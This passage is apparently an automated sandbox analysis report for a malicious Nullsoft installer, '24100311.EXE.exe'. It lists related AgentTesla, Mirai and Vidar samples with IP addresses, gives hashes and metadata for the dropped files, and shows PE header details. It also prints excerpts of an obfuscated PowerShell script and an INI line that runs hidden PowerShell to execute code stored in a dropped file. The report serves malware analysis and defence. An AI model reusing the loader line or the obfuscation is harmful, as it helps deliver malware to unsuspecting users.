                                            ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                              CCTC_PO_N.24042291PDF.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ftp.rusticpensiune.roLisectAVT_2403002A_35.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                COMANDA_AXM_NR17_DIN_240717.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                BESTELLU.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                Ordine_nr.24061168372.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                • 185.146.87.128
                                                CCTC_PO_N.24042291PDF.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.146.87.128
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                GTSCEGTSCentralEuropeAntelGermanyCZnovo.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 85.9.53.119
                                                https://en.softonic.comGet hashmaliciousUnknownBrowse
                                                • 62.209.227.210
                                                SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elfGet hashmaliciousUnknownBrowse
                                                • 89.40.18.196
                                                jade.arm.elfGet hashmaliciousMiraiBrowse
                                                • 91.120.127.45
                                                jade.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 94.42.225.26
                                                jade.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 94.42.225.72
                                                jydeTkHxMv.elfGet hashmaliciousUnknownBrowse
                                                • 194.108.169.227
                                                Awb_Shipping_doc_pdf_00900720242247820020091808174CN18009007000000924.vbsGet hashmaliciousUnknownBrowse
                                                • 188.240.235.52
                                                http://www.goo.su/fJu2F/Get hashmaliciousUnknownBrowse
                                                • 128.140.224.227
                                                SecuriteInfo.com.Linux.Siggen.9999.15962.9862.elfGet hashmaliciousMiraiBrowse
                                                • 212.65.204.255
                                                DJEMBA-ASROfxCP7I6KhH.elfGet hashmaliciousMiraiBrowse
                                                • 86.106.83.78
                                                2AoPFpxIKS.elfGet hashmaliciousMiraiBrowse
                                                • 86.106.83.74
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 109.73.128.91
                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 109.73.128.91
                                                4bblnRvDdS.lnkGet hashmaliciousUnknownBrowse
                                                • 109.73.128.91
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 109.73.128.91
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 109.73.128.91
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 109.73.128.91
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 109.73.128.91
                                                MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                • 109.73.128.91
                                                C5Nbn7P6GJ.exeGet hashmaliciousXRed, XWormBrowse
                                                • 109.73.128.91
                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                • 109.73.128.91
                                                No context
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):1050
                                                Entropy (8bit):3.266637478737807
                                                Encrypted:false
                                                SSDEEP:12:8wl01sXowAOcmIBru6/9Hp8VeiRoJiazec8ViRKQ1iKI6pKMrzmNbQgK4t2YZ/eJ:82LerZH+eiIiaCFi9s6CJmqy
                                                MD5:41331D3FD5F060F05C14BB329515DD12
                                                SHA1:ACAACDA12F8BD69C84B5747358B8724FAFE38DA6
                                                SHA-256:BD748C200FC464A7C26FED742D0AF38A35B99653185745DDAF7C6D39905101AC
                                                SHA-512:6591D04ED3A4C57B48BB933AEF6580AB1CC13AA98920AFBDCCBC77CA5C2C05AD6E17C58BFD108D24CD5570C2F730F844E9C797D06CD70315D37BF8D95D153031
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....T.1...........Videos..>............................................V.i.d.e.o.s.....b.1...........homeopathic.H............................................h.o.m.e.o.p.a.t.h.i.c.....z.2...........blodfattigheden.afs.X............................................b.l.o.d.f.a.t.t.i.g.h.e.d.e.n...a.f.s..."...8.....\.....\.U.s.e.r.s.\.j.o.n.e.s.\.V.i.d.e.o.s.\.h.o.m.e.o.p.a.t.h.i.c.\.b.l.o.d.f.a.t.t.i.g.h.e.d.e.n...a.f.s.H.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.e.c.e.n.t.r.a.l.i.s.e.r.i.n.g.e.r.s.\.m.i.s.d.i.d.i.v.e.d.\.U.n.e.n.g.r.o.s.s.i.n.g.............!.................[E...|t...!...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):375677
                                                Entropy (8bit):6.746286624266194
                                                Encrypted:false
                                                SSDEEP:6144:IH93J1O/boIWBkeNFpKEkQS/kFcb1Qd9Zx2IE/uVSrHEtk2uXhm:+hjO/b/WBn/paEw4xfSrHqkLk
                                                MD5:66C0EF51E4F41139F546EBF7523FFEDF
                                                SHA1:91EAA3B8D3A0DC7E3910BC6AE9BC860348E4238B
                                                SHA-256:68DFB148B273FB7ABB5BAF0E42DBCB86127D1682B5BAE1EDE8A1B50BD00059D2
                                                SHA-512:67D627D0CCCDE23112FED8B0DF113D8A7943E95AA4990E9DB9CE5BAE04436A81C01F9FFBDA87577C2A52B8A596943C6F30636370E9FA8E0DDE56B443EB80DF1A
                                                Malicious:false
                                                Reputation:low
                                                Preview:hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:ASCII text, with very long lines (3293), with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):55793
                                                Entropy (8bit):5.328821202366339
                                                Encrypted:false
                                                SSDEEP:1536:h4gmjN3ekb38e9Q4rjWK2kO6qXmBIvNdMhsf6x/u6T:mP17x9QAjZlIm6/MSC
                                                MD5:9BB7BC97960FEF33D8884CDCA423C2DD
                                                SHA1:A316731A54A85C2B2C99BE377B81196A08C81D7F
                                                SHA-256:E03CA6B56A172DF4B35A9862314B1C8993D4981923A7BCA152B8324931F3B303
                                                SHA-512:3B314D83E646B01E5E2506CB9D16101FE8F3F5AE1EE74291FD12AC6BE5ABB80EBC8C55CD19FD07050962BB4181D16ACE9F12D3100F86CA6CF6962FAECDEF45D8
                                                Malicious:true
                                                Reputation:low
                                                Preview:$Regulerings=$Digtcyklusens213;..<#Bundfldelses preferral Taarekirtlen Overdemand #>..<#Williche Retreat Marlowism Hurcheon Memorandumblok Herskedes #>..<#Sysselstningen Revokserne festsangens #>..<#Slvbrudens Jestingstock Myzostoma Butikscenterets Derned #>..<#Optagelsesprverne Telefonernes Personalekontor Italicising Fstningens Hesperus #>..<#Zonesystemet Akutbehandling Endogastric #>...$Gardernes = @'.Knipl.Pio e$StifrpOrt oa.ommerBraggtTiltoi hillaOplselHerruiAdultsParectTankaaStalag leepg U rorTekstuPapi.nNonpldRkenss Formm ehoaBrigut S.laehabilrPerspiC,oosaStrailSkarpeNospinEurosg BuggvExcepeInte rHurratH lvf= Stat$ UndeSHermeaPlaybeEddertaftentEncole Sporr Ech ;Ta ge.Gyro fWi.dfuNeuronwienec Umant Ser.i utodoIbrndnkvind strejG.jusghMyndioSny.esFatigtFlam,hViceuoenginoHarrydKipni ,ndfj(D ffu$MerohDRugemr ayraiRase fM rnat IntesDatoliBi.gik Wienr ntiaiKmpegnT,icogUdspieSljfer Precnpoli eAdditsPleas,Bioge$ So apProcta gastrTre.atimpudi PhytaSkrbulArbe.istinksForm.tPlatt)Sarsa Klir
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:ASCII text, with very long lines (422), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):500
                                                Entropy (8bit):4.298494007544533
                                                Encrypted:false
                                                SSDEEP:12:WKB/LpGCbQ0MsuHcCHEmBCfm3OGyrTxuQ:WKB/LpGCbQ0MsuHcIBhlyrdv
                                                MD5:003D1691439F3E11D89BB4EBDFDD65B2
                                                SHA1:A0F9503A7D61FE732FA7BA256FC8C1311A8BFE28
                                                SHA-256:80C75B3A6E0E988D75BD2CA17A943C89D2D1A0A0A2C814D765D206FC224ECDFA
                                                SHA-512:C0522A278A0C90A3C9AF763C465828087D433A4B20B93975AA91439C1222A5907E4E513CF45C730BCA7455FDC2421A02E7B8F939570B34FEE7CACA2786E0B3B0
                                                Malicious:false
                                                Reputation:low
                                                Preview:steng fyldestgre bulbocodium knivspidser barkende atrichia animations.yonnie lysosomes perlucidus kinesalgia.hovedkloakkens miljaktivister lnpotsystemernes neutronbombernes generalised indekslaans hazzan,almuekunst rengringer nonprosses fejldisponeredes angaar nurtural galgekran,indvindingers slovakkens folkevognsrugbrdenes potentializations commentary monetr milieuskadens faroff irides karusserne ufredstids disulphate..baskish manipulatory gaucie heterodonta gavlvg parachromatosis comtemplated.
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):464496
                                                Entropy (8bit):1.2481889412219012
                                                Encrypted:false
                                                SSDEEP:1536:euJ9bietYjnEM1tuaptEitTeXdaoKnEJiuMEhdMc:7WetSXbuaPHcdb8HuMKZ
                                                MD5:5EACC3D95DF827FE1B5A831DFBFE94A6
                                                SHA1:988F9AE49BFC1BB63D112447031A5A17B591796C
                                                SHA-256:AC93CF686EAAAA6E5AB1BEA98F581B9E2CD7D3E9086F6FFB74A5906896567E04
                                                SHA-512:6FF686349AA661445538CEE916F1FAC8DB832B3239930C37BB4A2F14B0F20509FD00EEB4ED5C3D47F13BB4D906E37957DF2B113920CD8B988D6D29CEE53182A4
                                                Malicious:false
                                                Reputation:low
                                                Preview:..................................................................T...............................................................h................................b.....................................................Q.....................m...........t.....................................g>.............I..............................8....................8..+...............................X................................................................NZ.'................................................1..............................U..................................u........................................_...............................................^..................................GN.................,..................................................H.......&....i.........b.................................C.............................................................................M................-................C...........................1.........c........................
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):468587
                                                Entropy (8bit):1.2584354414549628
                                                Encrypted:false
                                                SSDEEP:1536:DFBU5auyJfUuzHX+5RbwJiriFGZ67umM6nG+wH:QwJs6XsLrp6DMNH
                                                MD5:4340BC9925C2BE0D99E74E84C6B7BBC0
                                                SHA1:178EC4E5D9AFC934C28C205A6ACF70E7C6284826
                                                SHA-256:A670BE3845D4162FBE20DFBFA63E3FF423537989FB9DDE3F05B441B5DE94C16D
                                                SHA-512:A78D6DC0BDAF95EDE77D6A91FC37F1F1BC5C3B7BD646DC94255E458FA84AD0705060346B515C84A0026691AF0C1513FA7FF3FBD39B3FF6B0B78AB36087B59666
                                                Malicious:false
                                                Preview:6......F........O..............................................v...............]...._..Z..............,.........................................................,...................................................S.....f.............................n........................................a...a.....................k.....................&....N..........A................-.................................................................................................H..........................................3....................D.......................................=.............................................%............5..1.................f.........l...............................z................d................*......B........................P...........8.b..................+.........N ...............................................O..................................................u.........................E................................Z...-......................L..........
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:Matlab v4 mat-file (little endian) $, numeric, rows 0, columns 180
                                                Category:dropped
                                                Size (bytes):489743
                                                Entropy (8bit):1.2531074834260236
                                                Encrypted:false
                                                SSDEEP:1536:ufSdSy62D7PYFol6sSS1ThMQt6DnnI4+z5apzmvd+WDwU:ASZL3PDlRSyGNpzKd
                                                MD5:8963DD6A34716562750B65D09288C44C
                                                SHA1:28292BACEB0B7503690CA6F6A6AE4C1B6581280F
                                                SHA-256:4E56FA3BA867269C4FD36589A91F0293760079607086A62F53CE5CD93F7EA5FA
                                                SHA-512:6ADECF2CABF0CE0611D7D3C072C45EB1578D3D6A29A570E58DCE44EFB676BBEB36444DBFB6C5E6DE038CEB97F8F418572979C36EDF9EF7C44969AFB211C1866A
                                                Malicious:false
                                                Preview:................A.{.$.....X.....................................J.......T.......L................................g..........[....&.......Y.H.................................H/..........8..................................................%...............v..........................................................E......*...........................................2.........................................................................................|..................5..............................................................$............................................2.R...............y....5....................................y..................................j..................f..................M....9.......................a..........................\.................U..............F..6...............A............................^.................................T.......................................................,..............................0................d.e.%........
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):14744
                                                Entropy (8bit):4.992175361088568
                                                Encrypted:false
                                                SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                MD5:A35685B2B980F4BD3C6FD278EA661412
                                                SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                Malicious:false
                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):241
                                                Entropy (8bit):5.106909071374452
                                                Encrypted:false
                                                SSDEEP:6:HH9vtxdpjk0FuCmRAuwkn23wWWAAxB4DjAq4fBeSL9Y14iO98n:HPvBRGmpfgHL4/T4f4S44iOKn
                                                MD5:D2A776B7662BF32092C9CE9830024A49
                                                SHA1:5F9ED63C8B9F546F5AD9D934240B710F6727F3D8
                                                SHA-256:61A01A1623D783B3DDF45A63722C90EE682DEB04CF5D2A88C1BD7A205B403BBC
                                                SHA-512:08FA899F574EA28DEE60696D3FD432A4C479B9ECBA3559037427B78DA7D8427797E3CD083A6917C14EB05420E2A865C3B91178921A0910296900BC79DCBDA563
                                                Malicious:false
                                                Preview:[Ini App]..Load=-windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)" ..
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\24100311.EXE.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1868249
                                                Entropy (8bit):3.1164308520554607
                                                Encrypted:false
                                                SSDEEP:12288:LhjO/b/WBn/paEw4xfSrHqkLkPM76Gs6qsMC:Lhjcb0QE5tSrpGBXsMC
                                                MD5:CE900B8FE8C2C263E4A32C1D154F57F5
                                                SHA1:1680B4822AD21FDC7E79D5911EBD52A2E3A07DC6
                                                SHA-256:55C283E52C6AB1A1A4AD1C269B0FBC0D4A107084D7E1119FA324DEEE37B4428A
                                                SHA-512:55D5BA25642562DD2EF2F082F68C3CBD991A95275FD58F0B19FB95E5E7FE1F995D56D27D0BEC654580696BFE6ECC6E4B975AE285E53F700BB9266511524FAD63
                                                Malicious:false
                                                Preview:b4......,................................3......b4................................................~.........................................................................................................................................................................................G...^...........m...j...............................................................................................................................!...........a...&.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):6.811095847250619
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:24100311.EXE.exe
                                                File size:1'029'176 bytes
                                                MD5:36c593a2ceb2680510f2094cd6e4010d
                                                SHA1:03f1e81a26c614bcac620bbcd7a90f078e7d6146
                                                SHA256:faa7829ce9f42c0f66f754bda78ed09257191d44be15b16583e1a2df1eceff64
                                                SHA512:0aef0057ec535bb8b892462b9859396ca59531913eeed4385e6680d1930d85fc1cec6ee12802fa3c4c397b2240f63850eba140179c92e3f4ce4a8baf15f1a9ca
                                                SSDEEP:24576:UgD0Xah46clx/flW5y0DGeYongL84sNEQj:UgYXaefsZ3YoY84gjj
                                                TLSH:B625ADC03DB84EC2DA33C7FC04986561DF3B7E275D50A44A11E43AEB2EB94A35839D5A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....
                                                Icon Hash:334dc19acc61130c
                                                Entrypoint:0x4035d8
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x5F24D702 [Sat Aug 1 02:44:18 2020 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:c05041e01f84e1ccca9c4451f3b6a383
                                                Signature Valid:false
                                                Signature Issuer:CN="Tegnebestikkets Iconography Valses ", E=Fllesbetegnelsernes@Ecphorize.St, L=Hart, S=England, C=GB
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 29/09/2024 03:51:59 29/09/2027 03:51:59
                                                Subject Chain
                                                • CN="Tegnebestikkets Iconography Valses ", E=Fllesbetegnelsernes@Ecphorize.St, L=Hart, S=England, C=GB
                                                Version:3
                                                Thumbprint MD5:A9B725F67EF9ED38B5477D297C02E0E3
                                                Thumbprint SHA-1:C4250369923A3DF22D7B5D081C6CF98DCB182BA3
                                                Thumbprint SHA-256:4FD21B6D38F994DE281A06812B39CDBD127B2A705844D19F8D6593355DEA0FAF
                                                Serial:08EB46FA48CE35DDAA254B308AF2B2533A3C626A
                                                Instruction
                                                sub esp, 000002D4h
                                                push ebx
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+14h], ebx
                                                mov dword ptr [esp+10h], 0040A230h
                                                mov dword ptr [esp+1Ch], ebx
                                                call dword ptr [004080C8h]
                                                call dword ptr [004080CCh]
                                                and eax, BFFFFFFFh
                                                cmp ax, 00000006h
                                                mov dword ptr [0042A26Ch], eax
                                                je 00007FC0109163B3h
                                                push ebx
                                                call 00007FC0109196B9h
                                                cmp eax, ebx
                                                je 00007FC0109163A9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 004082B0h
                                                push esi
                                                call 00007FC010919633h
                                                push esi
                                                call dword ptr [00408154h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], 00000000h
                                                jne 00007FC01091638Ch
                                                push 0000000Bh
                                                call 00007FC01091968Ch
                                                push 00000009h
                                                call 00007FC010919685h
                                                push 00000007h
                                                mov dword ptr [0042A264h], eax
                                                call 00007FC010919679h
                                                cmp eax, ebx
                                                je 00007FC0109163B1h
                                                push 0000001Eh
                                                call eax
                                                test eax, eax
                                                je 00007FC0109163A9h
                                                or byte ptr [0042A26Fh], 00000040h
                                                push ebp
                                                call dword ptr [00408038h]
                                                push ebx
                                                call dword ptr [00408298h]
                                                mov dword ptr [0042A338h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+34h]
                                                push 000002B4h
                                                push eax
                                                push ebx
                                                push 00421708h
                                                call dword ptr [0040818Ch]
                                                push 0040A384h
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x6c418.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xfaa680x9d0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x65720x6600869e1d11bbf88d92521c022fa6f3d4f0False0.6623008578431373data6.453919385955138IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x13980x140079e286249499b713a2ddbee33baa50daFalse0.449609375data5.1367175827370986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x203780x600b6d02c867f7bfbcf68de2cfeea94fd73False0.5078125data4.096809083627214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x2b0000x290000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x540000x6c4180x6c6009cad5a4d1eeecdca4621aa0b033c3bc9False0.28224796352364473data4.2292719636818665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
